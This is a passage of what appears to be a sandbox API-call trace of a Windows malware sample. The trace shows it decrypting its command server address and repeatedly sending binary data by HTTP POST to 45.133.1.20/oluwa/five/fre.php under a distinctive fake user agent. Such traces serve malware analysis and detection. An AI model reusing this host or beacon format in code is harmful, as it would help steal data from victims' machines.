ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0210.923] GetProcessHeap () returned 0x6a0000 [0210.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0210.923] GetProcessHeap () returned 0x6a0000 [0210.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0210.924] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.925] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.925] GetProcessHeap () returned 0x6a0000 [0210.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0210.925] GetProcessHeap () returned 0x6a0000 [0210.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0210.926] GetProcessHeap () returned 0x6a0000 [0210.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0210.926] GetProcessHeap () returned 0x6a0000 [0210.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0210.927] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.929] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.929] GetProcessHeap () returned 0x6a0000 [0210.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0210.929] GetProcessHeap () returned 0x6a0000 [0210.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0210.930] send (s=0x5c4, buf=0x6bd460*, len=242, flags=0) returned 242 [0210.930] send (s=0x5c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0210.930] GetProcessHeap () returned 0x6a0000 [0210.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0210.930] recv (in: s=0x5c4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0211.004] GetProcessHeap () returned 0x6a0000 [0211.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0211.005] GetProcessHeap () returned 0x6a0000 [0211.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0211.005] GetProcessHeap () returned 0x6a0000 [0211.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0211.006] GetProcessHeap () returned 0x6a0000 [0211.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0211.007] closesocket (s=0x5c4) returned 0 [0211.007] GetProcessHeap () returned 0x6a0000 [0211.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0211.008] GetProcessHeap () returned 0x6a0000 [0211.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.008] GetProcessHeap () returned 0x6a0000 [0211.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0211.008] GetProcessHeap () returned 0x6a0000 [0211.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0211.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13c) returned 0x5c4 [0211.012] Sleep (dwMilliseconds=0xea60) [0211.014] GetProcessHeap () returned 0x6a0000 [0211.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0211.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.016] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0211.039] GetProcessHeap () returned 0x6a0000 [0211.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0211.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.041] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0211.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.042] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.044] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.044] GetProcessHeap () returned 0x6a0000 [0211.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0211.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.046] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0211.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.053] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0211.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.054] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0211.054] GetProcessHeap () returned 0x6a0000 [0211.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.059] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.061] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.062] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.063] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.063] GetProcessHeap () returned 0x6a0000 [0211.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.063] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.064] GetProcessHeap () returned 0x6a0000 [0211.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.070] GetProcessHeap () returned 0x6a0000 [0211.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.071] GetProcessHeap () returned 0x6a0000 [0211.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0211.071] GetProcessHeap () returned 0x6a0000 [0211.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0211.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.072] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.078] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0211.087] GetProcessHeap () returned 0x6a0000 [0211.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0211.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.089] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0211.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.090] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.092] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.092] GetProcessHeap () returned 0x6a0000 [0211.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0211.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.093] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0211.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.094] CryptDestroyKey (hKey=0x6ad020) returned 1 [0211.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.095] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0211.095] GetProcessHeap () returned 0x6a0000 [0211.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.096] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0211.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.097] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0211.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.098] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0211.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.099] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0211.099] GetProcessHeap () returned 0x6a0000 [0211.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.101] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0211.101] GetProcessHeap () returned 0x6a0000 [0211.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0211.101] socket (af=2, type=1, protocol=6) returned 0x5c8 [0211.102] connect (s=0x5c8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0211.125] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0211.125] GetProcessHeap () returned 0x6a0000 [0211.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0211.125] GetProcessHeap () returned 0x6a0000 [0211.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0211.126] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.127] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.127] GetProcessHeap () returned 0x6a0000 [0211.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0211.127] GetProcessHeap () returned 0x6a0000 [0211.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.128] GetProcessHeap () returned 0x6a0000 [0211.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0211.128] GetProcessHeap () returned 0x6a0000 [0211.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0211.130] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.131] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.131] GetProcessHeap () returned 0x6a0000 [0211.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0211.131] GetProcessHeap () returned 0x6a0000 [0211.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.132] send (s=0x5c8, buf=0x6bd460*, len=242, flags=0) returned 242 [0211.132] send (s=0x5c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0211.132] GetProcessHeap () returned 0x6a0000 [0211.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0211.132] recv (in: s=0x5c8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0211.216] GetProcessHeap () returned 0x6a0000 [0211.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0211.217] GetProcessHeap () returned 0x6a0000 [0211.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0211.217] GetProcessHeap () returned 0x6a0000 [0211.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0211.217] GetProcessHeap () returned 0x6a0000 [0211.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0211.218] closesocket (s=0x5c8) returned 0 [0211.219] GetProcessHeap () returned 0x6a0000 [0211.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0211.219] GetProcessHeap () returned 0x6a0000 [0211.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.219] GetProcessHeap () returned 0x6a0000 [0211.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0211.219] GetProcessHeap () returned 0x6a0000 [0211.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x79c) returned 0x5c8 [0211.236] Sleep (dwMilliseconds=0xea60) [0211.238] GetProcessHeap () returned 0x6a0000 [0211.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0211.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.250] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0211.259] GetProcessHeap () returned 0x6a0000 [0211.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0211.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.260] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0211.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.265] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.267] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.267] GetProcessHeap () returned 0x6a0000 [0211.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0211.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.269] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0211.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.270] CryptDestroyKey (hKey=0x6ad020) returned 1 [0211.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.284] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0211.284] GetProcessHeap () returned 0x6a0000 [0211.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.285] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.287] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.288] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.289] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.289] GetProcessHeap () returned 0x6a0000 [0211.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0211.290] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.290] GetProcessHeap () returned 0x6a0000 [0211.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0211.291] GetProcessHeap () returned 0x6a0000 [0211.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.291] GetProcessHeap () returned 0x6a0000 [0211.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0211.291] GetProcessHeap () returned 0x6a0000 [0211.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0211.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.293] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.303] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0211.314] GetProcessHeap () returned 0x6a0000 [0211.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0211.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.318] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0211.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.320] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.321] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.321] GetProcessHeap () returned 0x6a0000 [0211.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0211.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.323] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0211.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.324] CryptDestroyKey (hKey=0x6ad020) returned 1 [0211.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.325] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0211.325] GetProcessHeap () returned 0x6a0000 [0211.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.327] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0211.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.328] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0211.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.329] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0211.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.330] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0211.330] GetProcessHeap () returned 0x6a0000 [0211.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.331] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0211.331] GetProcessHeap () returned 0x6a0000 [0211.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0211.331] socket (af=2, type=1, protocol=6) returned 0x5cc [0211.331] connect (s=0x5cc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0211.357] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0211.357] GetProcessHeap () returned 0x6a0000 [0211.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0211.357] GetProcessHeap () returned 0x6a0000 [0211.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0211.358] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.359] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: 